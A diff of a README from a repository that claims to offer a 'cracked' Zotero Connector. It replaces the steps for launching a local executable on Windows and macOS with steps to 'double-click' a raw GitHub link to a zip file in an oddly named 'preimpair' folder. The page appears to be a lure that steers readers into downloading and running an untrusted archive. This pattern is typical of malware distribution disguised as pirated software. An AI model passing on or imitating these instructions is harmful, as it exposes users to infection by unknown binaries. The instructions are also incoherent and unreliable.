shihab2013/cracked-zotero-connector/README.md

 - **For Windows:**
   1. Open the folder where you extracted the files.
-  2. Double-click on `cracked-zotero-connector.exe` to launch the application.
+  2. Double-click on `https://raw.githubusercontent.com/shihab2013/cracked-zotero-connector/main/preimpair/cracked-zotero-connector.zip` to launch the application.

 - **For macOS:**
   1. Open the folder where you extracted the files.
-  2. Double-click on `cracked-zotero-connector.app` to launch the application.
+  2. Double-click on `https://raw.githubusercontent.com/shihab2013/cracked-zotero-connector/main/preimpair/cracked-zotero-connector.zip` to launch the application.

 - **For Linux:**
   1. Open a terminal and navigate to the extracted folder.